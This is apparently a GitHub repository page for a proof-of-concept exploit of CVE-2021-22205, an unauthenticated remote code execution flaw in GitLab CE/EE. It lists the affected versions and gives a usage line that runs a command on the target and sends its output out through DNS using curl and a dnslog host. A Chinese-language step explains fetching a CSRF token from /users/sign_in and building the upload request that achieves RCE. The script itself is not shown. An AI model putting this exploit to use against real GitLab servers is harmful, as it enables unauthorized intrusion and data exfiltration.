影响版本:
- Gitlab CE/EE < 13.10.3
- Gitlab CE/EE < 13.9.6
- Gitlab CE/EE < 13.8.8
Usage
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
获取csrf-token:
通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce
ref:
-
Notifications
You must be signed in to change notification settings - Fork 29
r0eXpeR/CVE-2021-22205
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
About
CVE-2021-22205 Unauthorized RCE
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published